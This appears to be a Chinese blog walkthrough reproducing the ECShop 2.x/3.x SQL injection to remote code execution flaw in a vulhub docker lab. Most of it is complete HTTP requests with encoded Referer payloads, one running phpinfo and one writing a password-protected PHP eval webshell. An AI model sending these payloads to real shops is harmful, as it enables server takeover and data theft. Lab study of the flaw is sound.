ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞
阿新 • • 發佈:2021-07-13
ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞
ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞
ECShop是一款B2C獨立網店系統,適合企業及個人快速構建個性化網上商店。系統是基於PHP語言及MYSQL資料庫構架開發的跨平臺開源程式。
其2017年及以前的版本中,存在一處SQL注入漏洞,通過該漏洞可注入惡意資料,最終導致任意程式碼執行漏洞。其3.6.0最新版已修復該漏洞,vulhub中使用其2.7.3最新版與3.6.0次新版進行漏洞復現。
漏洞環境
我們先下載環境,在github有別人直接搭建好的docker環境我們直接拿來用即可
git clone git://github.com/vulhub/vulhub.git cd vulhub/ecshop/xianzhi-2017-02-82239600/ docker-compose up -d
訪問IP:8080即可看到ecshop2.7.3的安裝頁面。
安裝配置這樣設定即可,資料庫密碼為root
這樣就算搭建完成了
訪問IP:8081即可看到ecshop3.6.0的安裝頁面。
安裝配置這樣設定即可,資料庫密碼為root
這樣就算搭建完成了
影響版本
Ecshop 2.x
Ecshop 3.x-3.6.0
漏洞復現
Ecshop 2.x
點選使用者抓包,然後修改referer值判斷漏洞是否存在payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0發現phpinfo命令執行成功
我們上傳一個webshell,payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} Content-Length: 0 Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0上傳的webshell名字為1.php,密碼為EDI,菜刀連線成功
Ecshop 3.x
點選使用者抓包,然後修改referer值判斷漏洞是否存在payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0發現phpinfo命令執行成功
我們上傳一個webshell,payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:286:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:9:"' union/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0上傳的webshell名字為1.php,密碼為EDI,菜刀連線成功